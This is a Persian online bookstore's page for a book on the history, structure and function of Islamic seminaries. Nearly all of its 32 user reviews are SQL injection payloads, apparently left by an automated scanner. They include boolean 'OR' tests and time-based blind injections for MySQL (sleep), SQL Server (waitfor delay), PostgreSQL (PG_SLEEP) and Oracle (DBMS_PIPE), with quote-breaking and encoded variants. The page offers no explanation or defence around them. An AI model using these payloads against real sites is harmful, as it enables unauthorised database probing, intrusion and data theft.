حوزه علمیه؛ تاریخ، ساختار، کارکرد (مجموعه کتابخانه دانشنامه جهان اسلام _ 31)

کد شناسه :123920

بررسی و نظر خود را بنویسید

1 2 3 4 5

 *

 *

32 نظر

 1. Rated 0از 5 امتیاز

  AZbramSc

  آیا این بررسی مفید بود؟ بله نه (0/0)
 2. Rated 0از 5 امتیاز

  1*

  آیا این بررسی مفید بود؟ بله نه (0/0)
 3. Rated 0از 5 امتیاز

  1*

  آیا این بررسی مفید بود؟ بله نه (0/0)
 4. Rated 0از 5 امتیاز

  1*

  آیا این بررسی مفید بود؟ بله نه (0/0)
 5. Rated 0از 5 امتیاز

  1*

  آیا این بررسی مفید بود؟ بله نه (0/0)
 6. Rated 0از 5 امتیاز

  -1 OR 2+667-667-1=0+0+0+1

  آیا این بررسی مفید بود؟ بله نه (0/0)
 7. Rated 0از 5 امتیاز

  -1 OR 3+667-667-1=0+0+0+1

  آیا این بررسی مفید بود؟ بله نه (0/0)
 8. Rated 0از 5 امتیاز

  -1 OR 3*2<(0+5+667-667)

  آیا این بررسی مفید بود؟ بله نه (0/0)
 9. Rated 0از 5 امتیاز

  -1 OR 3*2>(0+5+667-667)

  آیا این بررسی مفید بود؟ بله نه (0/0)
 10. Rated 0از 5 امتیاز

  RLIKE (SELECT (CASE WHEN (291=291) THEN 1 ELSE 0x28 END)) --

  آیا این بررسی مفید بود؟ بله نه (0/0)
 11. Rated 0از 5 امتیاز

  if(now()=sysdate(),sleep(15),0)

  آیا این بررسی مفید بود؟ بله نه (0/0)
 12. Rated 0از 5 امتیاز

  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  آیا این بررسی مفید بود؟ بله نه (0/0)
 13. Rated 0از 5 امتیاز

  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  آیا این بررسی مفید بود؟ بله نه (0/0)
 14. Rated 0از 5 امتیاز

  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  آیا این بررسی مفید بود؟ بله نه (0/0)
 15. Rated 0از 5 امتیاز

  -1; waitfor delay '0:0:15' --

  آیا این بررسی مفید بود؟ بله نه (0/0)
 16. Rated 0از 5 امتیاز

  -1); waitfor delay '0:0:15' --

  آیا این بررسی مفید بود؟ بله نه (0/0)
 17. Rated 0از 5 امتیاز

  -1)); waitfor delay '0:0:15' --

  آیا این بررسی مفید بود؟ بله نه (0/0)
 18. Rated 0از 5 امتیاز

  1 waitfor delay '0:0:15' --

  آیا این بررسی مفید بود؟ بله نه (0/0)
 19. Rated 0از 5 امتیاز

  QOPtJ89L'; waitfor delay '0:0:15' --

  آیا این بررسی مفید بود؟ بله نه (0/0)
 20. Rated 0از 5 امتیاز

  M3hUkqls'); waitfor delay '0:0:15' --

  آیا این بررسی مفید بود؟ بله نه (0/0)
 21. Rated 0از 5 امتیاز

  4I7IYLkj')); waitfor delay '0:0:15' --

  آیا این بررسی مفید بود؟ بله نه (0/0)
 22. Rated 0از 5 امتیاز

  -5 OR 834=(SELECT 834 FROM PG_SLEEP(15))--

  آیا این بررسی مفید بود؟ بله نه (0/0)
 23. Rated 0از 5 امتیاز

  -5) OR 316=(SELECT 316 FROM PG_SLEEP(15))--

  آیا این بررسی مفید بود؟ بله نه (0/0)
 24. Rated 0از 5 امتیاز

  -1)) OR 123=(SELECT 123 FROM PG_SLEEP(15))--

  آیا این بررسی مفید بود؟ بله نه (0/0)
 25. Rated 0از 5 امتیاز

  H0FyyAnE' OR 79=(SELECT 79 FROM PG_SLEEP(15))--

  آیا این بررسی مفید بود؟ بله نه (0/0)
 26. Rated 0از 5 امتیاز

  xWeLnaCG') OR 582=(SELECT 582 FROM PG_SLEEP(15))--

  آیا این بررسی مفید بود؟ بله نه (0/0)
 27. Rated 0از 5 امتیاز

  tJaehO0W')) OR 730=(SELECT 730 FROM PG_SLEEP(15))--

  آیا این بررسی مفید بود؟ بله نه (0/0)
 28. Rated 0از 5 امتیاز

  *DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

  آیا این بررسی مفید بود؟ بله نه (0/0)
 29. Rated 0از 5 امتیاز

  '||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  آیا این بررسی مفید بود؟ بله نه (0/0)
 30. Rated 0از 5 امتیاز

  1'"

  آیا این بررسی مفید بود؟ بله نه (0/0)
 31. Rated 0از 5 امتیاز

  1����%2527%2522

  آیا این بررسی مفید بود؟ بله نه (0/0)
 32. Rated 0از 5 امتیاز

  @@XH2p6

  آیا این بررسی مفید بود؟ بله نه (0/0)